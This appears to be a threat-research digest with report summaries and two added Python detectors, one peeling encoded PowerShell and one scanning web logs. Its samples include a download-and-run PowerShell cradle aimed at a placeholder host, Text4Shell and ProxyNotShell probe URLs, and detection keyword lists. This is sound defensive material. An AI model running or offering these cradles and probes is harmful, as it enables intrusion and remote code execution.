A malware dropper uses Outlook.com email as its command-and-control channel, polling a mailbox via IMAP and exfiltrating results back through email. The Python-based dropper decrypts a payload with AES, executes commands via a shell, and uses base64/ROT13 enco…
Category: Threat Research
Two security analyses describe attacks against unpatched Apache Tomcat servers, using JexBoss to install a web shell and gain control with Meterpreter. The attackers then use a Base64-encoded PowerShell downloader to fetch and run scripts…
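Both the Outlook.com dropper above (base64/ROT13 layering over an AES-encrypted payload) and the Tomcat intrusion (a Base64-encoded PowerShell downloader) hide the next stage behind cheap text encodings, and the first triage step is simply peeling those layers off and looking for a download cradle. The following is an added example, not code from either report or from the malware itself: a small Python decoder that strips base64, ROT13-over-base64 and PowerShell `-EncodedCommand` (base64 over UTF-16LE) layers and then flags common cradle keywords. The two sample strings are constructed here, as are the cradle keyword list and the layer names; real samples may add further layers (compression, XOR, the AES stage) that this does not handle.

```python
import base64
import binascii
import codecs
import re

# Constructed samples (not taken from the reports): the kind of strings pulled
# from a dropper's config or from a logged PowerShell command line.
PS_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
    .encode("utf-16-le")
).decode()
ROT13_B64 = codecs.encode(base64.b64encode(b"whoami && id").decode(), "rot_13")

# Download-cradle indicators: (name, regex). Matched case-insensitively,
# as PowerShell itself is. This list is an assumption, not the reports' IOCs.
CRADLES = [
    ("IEX", r"\bIEX\b"),
    ("Invoke-Expression", r"Invoke-Expression"),
    ("DownloadString", r"DownloadString"),
    ("DownloadFile", r"DownloadFile"),
    ("Invoke-WebRequest", r"Invoke-WebRequest"),
    ("Start-BitsTransfer", r"Start-BitsTransfer"),
]


def _printable(s):
    return bool(s) and all(c.isprintable() or c in "\r\n\t" for c in s)


def _try_base64(text):
    """Return (layer_name, decoded_text) if `text` is base64 of printable text, else None.

    UTF-16LE is tried first because that is what -EncodedCommand carries; the
    ASCII-only restriction on that branch stops plain UTF-8 bytes from being
    misread as (valid but non-ASCII) UTF-16LE code points.
    """
    try:
        raw = base64.b64decode(text.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and len(raw) % 2 == 0:
        try:
            s = raw.decode("utf-16-le")
            if _printable(s) and all(ord(c) < 0x80 for c in s):
                return "base64(utf-16le)", s
        except UnicodeDecodeError:
            pass
    try:
        s = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return ("base64(utf-8)", s) if _printable(s) else None


def decode_powershell_encoded(blob):
    """Decode a PowerShell -EncodedCommand argument (base64 over UTF-16LE)."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def peel(blob, max_depth=6):
    """Strip base64 and ROT13+base64 layers until no further layer decodes.

    ROT13 keeps a base64 string inside the base64 alphabet, so it cannot be
    spotted by inspection; it is detected by whether un-rotating yields a
    blob that base64-decodes to printable text.
    """
    layers, current = [], blob
    for _ in range(max_depth):
        hit = _try_base64(current)
        if hit is None:
            hit = _try_base64(codecs.encode(current, "rot_13"))
            if hit is None:
                break
            hit = ("rot13+" + hit[0], hit[1])
        layers.append(hit[0])
        current = hit[1]
    return layers, current


def find_cradles(text):
    return [name for name, rx in CRADLES if re.search(rx, text, re.IGNORECASE)]


def analyze(blob):
    """Peel encoding layers and report which cradle keywords the plaintext contains."""
    layers, text = peel(blob)
    return {"layers": layers, "text": text, "cradles": find_cradles(text)}


if __name__ == "__main__":
    for sample in (PS_ENCODED, ROT13_B64):
        print(analyze(sample))
```

`analyze(PS_ENCODED)` reports one `base64(utf-16le)` layer and the cradles `IEX` and `DownloadString`; `analyze(ROT13_B64)` reports `rot13+base64(utf-8)` and the plaintext `whoami && id`. The printable-text check is a heuristic: binary stages (such as the AES-encrypted payload in the dropper) stop the loop, which is the point at which a real triage hands the blob to a decryptor rather than a decoder.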
Check Point’s Brand Phishing Report for Q3 2022 shows DHL as the brand most impersonated in phishing attempts (22%), with Microsoft (16%) and LinkedIn (11%) following; Instagram also enters the top ten due to a blue-badge phishing campaign. The report highlight…
Dormant Colors describes a widespread campaign of malicious browser extensions that infect millions of users via malvertising, then covertly load and update weaponized code to harvest data and enable targeted fraud. The investigation exposes a robust, globally…
The Magniber ransomware has evolved rapidly in 2022, shifting file extensions, injection techniques, and UAC bypass methods to dodge anti-malware detection. The analysis highlights frequent format changes and registry-focused tactics, alo…
Trend Micro analyzed an LV ransomware intrusion tied to ProxyShell and ProxyLogon exploits affecting a Jordan-based company, highlighting double-extortion and expanding affiliate activity. The report details the infection chain—from Exchange vulnerabilities an…
RDP is commonly used for initial compromise and lateral movement, including via wrappers when native remote desktop support is unavailable. The article also covers how attackers add user accounts, drop RDP-related malware, and employ credential theft and sessi…
Two Zscaler ThreatLabz reports reveal WarHawk, a new backdoor used by the SideWinder APT to target Pakistan, delivering Cobalt Strike via a multi-module loader that includes KernelCallBackTable injection and a Pakistan Standard Time check. The campaign leverag…
Daixin Team is a ransomware and data extortion group focused on Healthcare and Public Health sector targets in the U.S., using VPN compromises and credential theft to deploy ransomware on ESXi servers and exfiltrate data. The FBI/CISA/HHS advisory details TTPs…
Palo Alto Networks analyzes trends in web threats by examining malicious landing and host URLs, including where they are hosted, their categories, and associated malware families, with a focus on cryptominers, JS downloaders, web skimmers, and redirects. The r…
Cyble researchers describe Temp Loader and Temp Stealer, malicious tools advertised on the Dark Web that bundle with cracked software to drop a loader and an information stealer. The malware targets crypto wallets and various data sources, uses anti-VM and Run…
Attackers increasingly abuse legitimate remote-control tools to secretly take control of infected systems and evade detection. The article surveys backdoor and RAT families and real-world cases where tools like AnyDesk, TeamViewer, and VNC are misused for remo…
In April, VMware patched CVE-2022-22954, but attacks exploiting remote code execution via server-side template injection persisted, delivering Mirai variants, RAR1Ransom, and GuardMiner payloads to exposed VMware Workspace ONE Access and Identity Manager insta…
Wordfence Threat Intelligence monitored exploit attempts targeting CVE-2022-42889, aka Text4Shell, across millions of sites and observed payloads in DNS, script, and URL prefixes aimed at remote code execution. Most activity leverages DNS prefix probes to cont…
Two zero-day Exchange vulnerabilities, CVE-2022-41040 and CVE-2022-41082 (ProxyNotShell), are being actively exploited in the wild, with over 1.6 million exploit attempts observed across 4 million protected websites. The activity shows GET-based probing agains…
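The last three entries (the CVE-2022-22954 template-injection attacks, the Text4Shell probes and the ProxyNotShell probing) share one property: the exploit attempt is visible in the request URL of an ordinary access log, often URL-encoded once or twice. The following is an added example, not code from Wordfence or any of the vendors summarized above: a Python scanner that normalizes the request path and classifies each line against three rules. The Text4Shell rule uses the `dns:`, `script:` and `url:` prefixes named in the Wordfence summary; the ProxyNotShell rule assumes the published `autodiscover.json ... @ ... powershell` URL shape; and because the summary does not give the exact CVE-2022-22954 request, that case is reduced to a generic `${...}` template-expression check. The log lines, addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in combined-log shape (not taken from the reports).
# Hosts, IPs and paths are made up; only the indicator syntax matters.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Oct/2022:10:00:01 +0000] "GET /search?q=%24%7Bdns%3Aaddress%7Cprobe.example.invalid%7D HTTP/1.1" 200 512
203.0.113.6 - - [25/Oct/2022:10:00:02 +0000] "GET /autodiscover/autodiscover.json?@evil.example.invalid/powershell/&Email=autodiscover/autodiscover.json%3F@evil.example.invalid HTTP/1.1" 401 0
203.0.113.7 - - [25/Oct/2022:10:00:03 +0000] "GET /login?name=%2524%257B7%252A7%257D HTTP/1.1" 200 88
203.0.113.8 - - [25/Oct/2022:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024
203.0.113.9 - - [25/Oct/2022:10:00:05 +0000] "GET /api?x=%24%7Bscript%3Ajavascript%3A1%2B1%7D HTTP/1.1" 500 0
"""

# Combined-log request line: client, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Ordered most-specific first; the first matching rule wins.
# The Text4Shell prefixes come from the summary above; the ProxyNotShell
# pattern is an assumption based on the published autodiscover/powershell
# URL shape; the last rule is a generic template-expression check.
RULES = [
    ("text4shell-cve-2022-42889", re.compile(r"\$\{\s*(?:dns|script|url)\s*:", re.I)),
    ("proxynotshell-cve-2022-41040", re.compile(r"autodiscover\.json.*@.*powershell", re.I)),
    ("ssti-expression", re.compile(r"\$\{[^}]*\}")),
]


def normalize(path, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded probes are not missed."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line):
    """Return a hit dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = normalize(m["path"])
    for name, rx in RULES:
        if rx.search(path):
            return {
                "ip": m["ip"],
                "ts": m["ts"],
                "method": m["method"],
                "status": m["status"],
                "rule": name,
                "path": path,
            }
    return None


def scan(log_text):
    """Classify every line of an access log and return the hits in order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["rule"]:30} {hit["method"]} {hit["path"]}')
```

Running it over the sample yields four hits (two Text4Shell, one ProxyNotShell, one generic `${7*7}` probe) and ignores the plain `/index.html` request. Matching happens on the decoded path, which is why the double-encoded `%2524%257B...` line is still caught; the bounded decode loop avoids looping forever on pathological input. In production the same three regexes belong in the WAF or SIEM query rather than a script, but the normalization step is the part that is most often forgotten.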